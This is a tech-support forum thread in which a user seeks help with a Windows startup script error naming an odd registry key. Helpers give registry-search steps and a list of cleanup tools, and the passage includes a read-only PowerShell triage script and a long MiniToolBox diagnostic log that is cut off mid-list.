Script Error pop up when computer starts


12 replies to this topic

#1 HonSern

HonSern

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 04 September 2016 - 01:26 AM

Hi,

 

I'm not sure, but I think my computer might have been infected by malware due to my recent installation of software.

 

Could somebody please guide me through a way to clean my computer of this matter?

 

The script error is as below

An error has occured in the script on this page

Line: 1

Char: 72

Error: Invalid root in registry key "HKCU\software\pdgzul\dexpufdr"

Code: 0

URL: 

 

Please help me to resolve this problem 

 

 




 


#2 kaljukass

kaljukass

  • Banned
  • 291 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:22 PM

Posted 04 September 2016 - 01:59 AM

If you're talking about the computer, then such a registry key does not have to be there at all.
Open regedit.exe, look for this key, i.e. find it, right-click it, export it (make a backup copy) and delete it completely.
Make a restart, and see what happened. When all was lost, the thing is settled; if not, you can continue searching.
Probably this is some kind of outdated and corrupted registry key. An obsolete key.
If you don't remember how to open the registry editor, then use this method:
WinKey + R => regedit.exe => OK or Enter


Edited by kaljukass, 04 September 2016 - 02:14 AM.


#3 HonSern

HonSern
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 04 September 2016 - 02:14 AM

Hi Kaljuk,

 

How do I search for that line of error in regedit?

 

I have tried searching for it under HKEY_CURRENT_USER > SOFTWARE

but I couldn't seem to be able to locate a file that says "pdgzul"



#4 kaljukass

kaljukass

  • Banned
  • 291 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:08:22 PM

Posted 04 September 2016 - 02:26 AM

Use the registry editor search if needed, i.e. click on the first line in the registry editor, which is "Computer", then open Edit in the menu, and there is Find.

Put there the thing you want to find, i.e. pdgzul\dexpufdr

then click "Find Next"; if it stops, then press F3 until you have found it.

NB! Do not delete anything if you don't know exactly what it is.
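A read-only PowerShell equivalent of the regedit search and backup described above, as an added example that is not part of the original posts. The key name comes from the error text in post #1; the list of autostart locations and the backup file name are assumptions made for this example.

```powershell
# Added example: read-only triage for the registry key named in the script error.
# Nothing here deletes or modifies registry data.
#
# Windows Script Host reports "Invalid root in registry key" when a script asks
# it to read a key or value that cannot be opened, so the key itself may be
# absent while the startup entry that tries to read it is still present.

$Needle  = 'pdgzul'                    # key name taken from the error message
$KeyPath = 'HKCU:\Software\pdgzul'     # location given in the error message

# 1. Does the key from the error message exist for the current user?
if (Test-Path -LiteralPath $KeyPath) {
    "Found $KeyPath"
    Get-ChildItem -LiteralPath $KeyPath -Recurse -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty Name

    # Export a backup before anything is changed, as advised in post #2.
    # The file name is a placeholder chosen for this example.
    $Backup = Join-Path $env:USERPROFILE 'Desktop\pdgzul-backup.reg'
    & reg.exe export 'HKCU\Software\pdgzul' $Backup /y | Out-Null
    "Backup written to $Backup"
} else {
    "Key $KeyPath was not found for this user."
}

# 2. Which autostart values mention the key name?
#    These are the standard per-user and per-machine Run/RunOnce keys.
$RunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

$Hits = foreach ($Key in $RunKeys) {
    if (-not (Test-Path -LiteralPath $Key)) { continue }

    $Item = Get-Item -LiteralPath $Key
    foreach ($Name in $Item.GetValueNames()) {
        # Cast to string so multi-string and expandable values are searchable.
        $Data = [string]$Item.GetValue($Name)
        if ($Data -match [regex]::Escape($Needle)) {
            [pscustomobject]@{
                Key   = $Key
                Value = $Name
                Data  = $Data
            }
        }
    }
}

# 3. Report what was found so it can be pasted into a reply.
if ($Hits) {
    $Hits | Format-List
} else {
    "No Run/RunOnce value references '$Needle'."
}
```

Run it from a normal (non-elevated) PowerShell window as the affected user, since `HKCU` is per-user.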



#5 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,239 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:02:22 PM

Posted 04 September 2016 - 02:29 AM

It's likely that there is a malware issue, that would explain the random registry items. It may be hidden also.

 

Please download MiniToolBox, save it to your desktop and run it.

 

Checkmark the following checkboxes:

 


 

Click Go and note the saved Result.txt on your desktop, to copy into your reply

 

Download Security Check from here or here and save it to your Desktop.

  • Double-click SecurityCheck.exe
  • Follow the onscreen instructions inside of the black box.
  • Please copy and paste the log into your reply.

If prompted by your firewall allow DIG.exe
If you receive UNSUPPORTED OPERATING SYSTEM! ABORTED! message restart computer and Security Check should run

 

Please download Farbar Service Scanner and run it

  • Please check all of the boxes then click Scan
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log into your reply.

Please download AdwCleaner and save to your Desktop. (if you have removed your previous copy)

  • Right click and "Run as Administrator"
  • Click on the Scan button.
  • After the scan has finished, click Clean
  • Click on the Report button...a logfile will open in Notepad for review.
  • A copy of all logfiles is saved in the C:\AdwCleaner folder which was created when running the tool, or you can save it to the desktop to be easily found for your reply.

 

Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts.
  • Right click and "Run as Administrator".
  • The tool will open and start scanning your system.
  • On completion a log will open, note the saved JRT.txt on your desktop to copy into your reply

Please download and install MalwareBytes Anti-Malware.

  • You may want to uncheck the free trial for the premium version during installation.
  • Let the database version update on first run, before proceeding
  • Click "Scan now"
  • Click "remove threats" to remove all and follow the reboot instructions.
  • To export the log click on History > then click your scan log > Export > text file
  • Save on your desktop

Please copy and paste all of the logs into your reply and let me know if the problem persists.

 

TsVk!



#6 HonSern

HonSern
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  

Posted 04 September 2016 - 03:38 AM

Hi TsVK

 

The log from MiniToolBox

 

MiniToolBox by Farbar  Version: 17-06-2016
Ran by User (administrator) on 04-09-2016 at 15:47:37
Running from "F:\迅雷下载"
Microsoft Windows 10 Home Single Language  (X64)
Model: GE62 6QD Manufacturer: Micro-Star International Co., Ltd.
Boot Mode: Normal
***************************************************************************
 
========================= Flush DNS: ===================================
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========================= IE Proxy Settings: ============================== 
 
Proxy is not enabled.
No Proxy Server is set.
 
"Reset IE Proxy Settings": IE Proxy Settings were reset.
========================= Hosts content: =================================
========================= IP Configuration: ================================
 
Intel® Dual Band Wireless-AC 3165 = Wi-Fi 2 (Connected)
Killer E2400 Gigabit Ethernet Controller = Ethernet 2 (Media disconnected)
 
 
# ----------------------------------
# IPv4 Configuration
# ----------------------------------
pushd interface ipv4
 
reset
set global
set interface interface="Local Area Connection* 1" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Wi-Fi" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Local Area Connection* 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Bluetooth Network Connection" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Ethernet" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Ethernet 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Wi-Fi 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Local Area Connection* 4" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Bluetooth Network Connection 2" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
 
 
popd
# End of IPv4 configuration
 
 
 
Windows IP Configuration
 
   Host Name . . . . . . . . . . . . : MSI
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : domain.name
 
Ethernet adapter Ethernet 2:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : hc2.hc2
   Description . . . . . . . . . . . : Killer e2400 Gigabit Ethernet Controller #2
   Physical Address. . . . . . . . . : 4C-CC-6A-7E-56-62
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
 
Wireless LAN adapter Local Area Connection* 4:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter #2
   Physical Address. . . . . . . . . : B8-81-98-E1-24-0F
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
 
Wireless LAN adapter Wi-Fi 2:
 
   Connection-specific DNS Suffix  . : domain.name
   Description . . . . . . . . . . . : Intel® Dual Band Wireless-AC 3165 #2
   Physical Address. . . . . . . . . : B8-81-98-E1-24-0E
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2001:e68:443a:6cff:4958:db56:c788:45a5(Preferred) 
   Temporary IPv6 Address. . . . . . : 2001:e68:443a:6cff:94ce:64a9:e24f:64dd(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::4958:db56:c788:45a5%3(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.1.2(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Sunday, 4 September, 2016 2:18:10 PM
   Lease Expires . . . . . . . . . . : Monday, 5 September, 2016 2:18:13 PM
   Default Gateway . . . . . . . . . : fe80::9a70:e8ff:fe0a:e725%3
                                       192.168.1.1
   DHCP Server . . . . . . . . . . . : 192.168.1.1
   DHCPv6 IAID . . . . . . . . . . . : 45646232
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-1F-3D-CA-91-D8-CB-8A-7F-3A-DC
   DNS Servers . . . . . . . . . . . : fe80::9a70:e8ff:fe0a:e725%3
                                       192.168.1.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
 
Tunnel adapter isatap.domain.name:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : domain.name
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
 
Tunnel adapter Teredo Tunneling Pseudo-Interface:
 
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2001:0:9d38:6ab8:385c:c9f7:3495:29fb(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::385c:c9f7:3495:29fb%5(Preferred) 
   Default Gateway . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 486539264
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-1F-3D-CA-91-D8-CB-8A-7F-3A-DC
   NetBIOS over Tcpip. . . . . . . . : Disabled
Server:  UnKnown
Address:  fe80::9a70:e8ff:fe0a:e725
 
 
Pinging google.com [2404:6800:4003:c01::71] with 32 bytes of data:
Request timed out.
Request timed out.
 
Ping statistics for 2404:6800:4003:c01::71:
    Packets: Sent = 2, Received = 0, Lost = 2 (100% loss),
Server:  UnKnown
Address:  fe80::9a70:e8ff:fe0a:e725
 
 
Pinging yahoo.com [2001:4998:44:204::a7] with 32 bytes of data:
Request timed out.
Request timed out.
 
Ping statistics for 2001:4998:44:204::a7:
    Packets: Sent = 2, Received = 0, Lost = 2 (100% loss),
 
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
 
Ping statistics for 127.0.0.1:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
===========================================================================
Interface List
  9...4c cc 6a 7e 56 62 ......Killer e2400 Gigabit Ethernet Controller #2
 11...b8 81 98 e1 24 0f ......Microsoft Wi-Fi Direct Virtual Adapter #2
  3...b8 81 98 e1 24 0e ......Intel® Dual Band Wireless-AC 3165 #2
  1...........................Software Loopback Interface 1
 10...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
  5...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================
 
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0      192.168.1.1      192.168.1.2     25
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
      192.168.1.0    255.255.255.0         On-link       192.168.1.2    281
      192.168.1.2  255.255.255.255         On-link       192.168.1.2    281
    192.168.1.255  255.255.255.255         On-link       192.168.1.2    281
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link       192.168.1.2    281
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link       192.168.1.2    281
===========================================================================
Persistent Routes:
  None
 
IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  3    281 ::/0                     fe80::9a70:e8ff:fe0a:e725
  1    306 ::1/128                  On-link
  5    306 2001::/32                On-link
  5    306 2001:0:9d38:6ab8:385c:c9f7:3495:29fb/128
                                    On-link
  3    281 2001:e68:443a:6cff::/64  On-link
  3    281 2001:e68:443a:6cff:4958:db56:c788:45a5/128
                                    On-link
  3    281 2001:e68:443a:6cff:94ce:64a9:e24f:64dd/128
                                    On-link
  3    281 fe80::/64                On-link
  5    306 fe80::/64                On-link
  5    306 fe80::385c:c9f7:3495:29fb/128
                                    On-link
  3    281 fe80::4958:db56:c788:45a5/128
                                    On-link
  1    306 ff00::/8                 On-link
  3    281 ff00::/8                 On-link
  5    306 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None
========================= Winsock entries =====================================
 
Catalog5 01 C:\Windows\SysWOW64\napinsp.dll [55808] (Microsoft Corporation)
Catalog5 02 C:\Windows\SysWOW64\pnrpnsp.dll [70656] (Microsoft Corporation)
Catalog5 03 C:\Windows\SysWOW64\pnrpnsp.dll [70656] (Microsoft Corporation)
Catalog5 04 C:\Windows\SysWOW64\NLAapi.dll [65024] (Microsoft Corporation)
Catalog5 05 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog5 06 C:\Windows\SysWOW64\winrnr.dll [23552] (Microsoft Corporation)
Catalog5 07 C:\Windows\SysWOW64\wshbth.dll [51712] (Microsoft Corporation)
Catalog9 01 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 02 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 03 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 04 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 05 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 06 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 07 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 08 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 09 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 10 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 11 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
Catalog9 12 C:\Windows\SysWOW64\mswsock.dll [312160] (Microsoft Corporation)
x64-Catalog5 01 C:\Windows\System32\napinsp.dll [68096] (Microsoft Corporation)
x64-Catalog5 02 C:\Windows\System32\pnrpnsp.dll [87040] (Microsoft Corporation)
x64-Catalog5 03 C:\Windows\System32\pnrpnsp.dll [87040] (Microsoft Corporation)
x64-Catalog5 04 C:\Windows\System32\NLAapi.dll [80896] (Microsoft Corporation)
x64-Catalog5 05 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog5 06 C:\Windows\System32\winrnr.dll [31744] (Microsoft Corporation)
x64-Catalog5 07 C:\Windows\System32\wshbth.dll [63488] (Microsoft Corporation)
x64-Catalog9 01 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 02 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 03 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 04 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 05 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 06 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 07 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 08 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 09 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 10 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 11 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
x64-Catalog9 12 C:\Windows\System32\mswsock.dll [357216] (Microsoft Corporation)
 
========================= Event log errors: ===============================
 
Application errors:
==================
Error: (09/04/2016 03:46:35 PM) (Source: Application Error) (User: )
Description: Faulting application name: regedit.exe, version: 10.0.10586.0, time stamp: 0x5632d798
Faulting module name: COMCTL32.dll, version: 6.10.10586.494, time stamp: 0x5775e30f
Exception code: 0xc00000fd
Fault offset: 0x00000000000037c9
Faulting process id: 0x2730
Faulting application start time: 0xregedit.exe0
Faulting application path: regedit.exe1
Faulting module path: regedit.exe2
Report Id: regedit.exe3
Faulting package full name: regedit.exe4
Faulting package-relative application ID: regedit.exe5
 
Error: (09/04/2016 02:19:13 PM) (Source: Perflib) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
 
Error: (09/04/2016 11:40:00 AM) (Source: Application Error) (User: )
Description: Faulting application name: WLANExt.exe, version: 10.0.10586.0, time stamp: 0x5632d7b9
Faulting module name: IWMSSvc.dll_unloaded, version: 18.12.0.0, time stamp: 0x559e4435
Exception code: 0xc0000005
Fault offset: 0x00000000000d8348
Faulting process id: 0x8b0
Faulting application start time: 0xWLANExt.exe0
Faulting application path: WLANExt.exe1
Faulting module path: WLANExt.exe2
Report Id: WLANExt.exe3
Faulting package full name: WLANExt.exe4
Faulting package-relative application ID: WLANExt.exe5
 
Error: (09/03/2016 01:28:39 PM) (Source: Microsoft-Windows-Immersive-Shell) (User: MSI)
Description: Activation of app Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2147023174 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (09/03/2016 10:28:09 AM) (Source: Application Error) (User: )
Description: Faulting application name: NvStreamUserAgent.exe, version: 4.1.2014.398, time stamp: 0x563b5873
Faulting module name: NvStreamUserAgent.exe, version: 4.1.2014.398, time stamp: 0x563b5873
Exception code: 0xc0000005
Fault offset: 0x000000000056e1f2
Faulting process id: 0x18f0
Faulting application start time: 0xNvStreamUserAgent.exe0
Faulting application path: NvStreamUserAgent.exe1
Faulting module path: NvStreamUserAgent.exe2
Report Id: NvStreamUserAgent.exe3
Faulting package full name: NvStreamUserAgent.exe4
Faulting package-relative application ID: NvStreamUserAgent.exe5
 
Error: (09/03/2016 09:47:36 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "LAVFilters.Dependencies,type="win32",version="1.0.0.0"1".
Dependent Assembly LAVFilters.Dependencies,type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "LAVFilters.Dependencies,type="win32",version="1.0.0.0"1".
Dependent Assembly LAVFilters.Dependencies,type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "LAVFilters.Dependencies,type="win32",version="1.0.0.0"1".
Dependent Assembly LAVFilters.Dependencies,type="win32",version="1.0.0.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
 
Error: (09/03/2016 09:45:18 AM) (Source: Application Error) (User: )
Description: Faulting application name: NSc.exe, version: 2.1.0.21, time stamp: 0x573502f2
Faulting module name: Nahimic2OSD.dll, version: 0.0.0.0, time stamp: 0x56fb9c4b
Exception code: 0xc0000005
Fault offset: 0x00005c29
Faulting process id: 0x1724
Faulting application start time: 0xNSc.exe0
Faulting application path: NSc.exe1
Faulting module path: NSc.exe2
Report Id: NSc.exe3
Faulting package full name: NSc.exe4
Faulting package-relative application ID: NSc.exe5
 
 
System errors:
=============
Error: (09/04/2016 02:17:30 PM) (Source: Service Control Manager) (User: )
Description: The User Data Access_1d44a53 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 02:17:30 PM) (Source: Service Control Manager) (User: )
Description: The User Data Storage_1d44a53 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 02:17:30 PM) (Source: Service Control Manager) (User: )
Description: The Contact Data_1d44a53 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 02:17:30 PM) (Source: Service Control Manager) (User: )
Description: The Sync Host_1d44a53 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:32:51 PM) (Source: Service Control Manager) (User: )
Description: The User Data Access_907021 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:32:51 PM) (Source: Service Control Manager) (User: )
Description: The User Data Storage_907021 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:32:51 PM) (Source: Service Control Manager) (User: )
Description: The Contact Data_907021 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:32:51 PM) (Source: Service Control Manager) (User: )
Description: The Sync Host_907021 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:13:00 AM) (Source: Service Control Manager) (User: )
Description: The User Data Access_65edb service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/04/2016 12:13:00 AM) (Source: Service Control Manager) (User: )
Description: The User Data Storage_65edb service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
 
Microsoft Office Sessions:
=========================
Error: (09/04/2016 03:46:35 PM) (Source: Application Error)(User: )
Description: regedit.exe10.0.10586.05632d798COMCTL32.dll6.10.10586.4945775e30fc00000fd00000000000037c9273001d2067be2a04f7cC:\Windows\regedit.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.494_none_a2d8b04ea53e3145\COMCTL32.dll2844e9ee-1a77-429b-90b2-7a9f7350d37b
 
Error: (09/04/2016 02:19:13 PM) (Source: Perflib)(User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
 
Error: (09/04/2016 11:40:00 AM) (Source: Application Error)(User: )
Description: WLANExt.exe10.0.10586.05632d7b9IWMSSvc.dll_unloaded18.12.0.0559e4435c000000500000000000d83488b001d205f49fe6eee4C:\Windows\system32\WLANExt.exeIWMSSvc.dllc221775e-22e3-487f-90f7-1898a2153d3d
 
Error: (09/03/2016 01:28:39 PM) (Source: Microsoft-Windows-Immersive-Shell)(User: MSI)
Description: Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1-2147023174
 
Error: (09/03/2016 10:28:09 AM) (Source: Application Error)(User: )
Description: NvStreamUserAgent.exe4.1.2014.398563b5873NvStreamUserAgent.exe4.1.2014.398563b5873c0000005000000000056e1f218f001d2058ac177e0d5C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exeC:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exedcf0c40e-0005-4781-82d4-ee104cdd4f9a
 
Error: (09/03/2016 09:47:36 AM) (Source: SideBySide)(User: )
Description: c:\Program Files\WinZip\adxloader.dll.Manifestc:\Program Files\WinZip\adxloader.dll.Manifest2
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide)(User: )
Description: LAVFilters.Dependencies,type="win32",version="1.0.0.0"C:\Users\Public\Thunder Network\APlayer\codecs\lavfilters\lavvideo.dll.Manifest
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide)(User: )
Description: LAVFilters.Dependencies,type="win32",version="1.0.0.0"C:\Users\Public\Thunder Network\APlayer\codecs\lavfilters\lavsplitter.dll.Manifest
 
Error: (09/03/2016 09:47:32 AM) (Source: SideBySide)(User: )
Description: LAVFilters.Dependencies,type="win32",version="1.0.0.0"C:\Users\Public\Thunder Network\APlayer\codecs\lavfilters\lavaudio.dll.Manifest
 
Error: (09/03/2016 09:45:18 AM) (Source: Application Error)(User: )
Description: NSc.exe2.1.0.21573502f2Nahimic2OSD.dll0.0.0.056fb9c4bc000000500005c29172401d20584d2c0e494C:\Program Files (x86)\Norton Security\Engine\22.7.1.32\NSc.exeC:\Program Files\Nahimic\Nahimic2\UserInterface\Nahimic2OSD.dll9ccb728f-4ae0-48c8-97f0-c0fd0774f9ec
 
 
CodeIntegrity Errors:
===================================
  Date: 2016-09-04 11:59:09.286
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-03 22:59:03.632
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-03 17:29:09.226
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 23:19:34.322
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 22:59:11.219
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 22:13:41.917
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 22:10:36.826
  Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume5\Program Files\Nahimic\Nahimic2\UserInterface\x64\Nahimic2OSD.dll that did not meet the Store signing level requirements.
 
  Date: 2016-09-02 21:24:15.722
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 11:59:18.208
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-09-02 08:48:41.976
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
 
=========================== Installed Programs ============================
 
ACA & MEP 2016 Object Enabler (HKLM\...\{5783F2D7-F004-0000-5102-0060B0CE6BBA}) (Version: 7.8.41.0 - Autodesk) Hidden
ACAD Private (HKLM\...\{5783F2D7-F001-0000-3102-0060B0CE6BBA}) (Version: 20.1.49.0 - Autodesk) Hidden
Adobe Acrobat XI Pro (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-000000000006}) (Version: 11.0.16 - Adobe Systems)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.1 - Adobe Systems Incorporated)
Asmedia USB Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.28.1 - Asmedia Technology)
AutoCAD 2016 - English (HKLM\...\{5783F2D7-F001-0409-2102-0060B0CE6BBA}) (Version: 20.1.49.0 - Autodesk) Hidden
AutoCAD 2016 (HKLM\...\{5783F2D7-F001-0000-0102-0060B0CE6BBA}) (Version: 20.1.49.0 - Autodesk) Hidden
AutoCAD 2016 Language Pack - English (HKLM\...\{5783F2D7-F001-0409-1102-0060B0CE6BBA}) (Version: 20.1.49.0 - Autodesk) Hidden
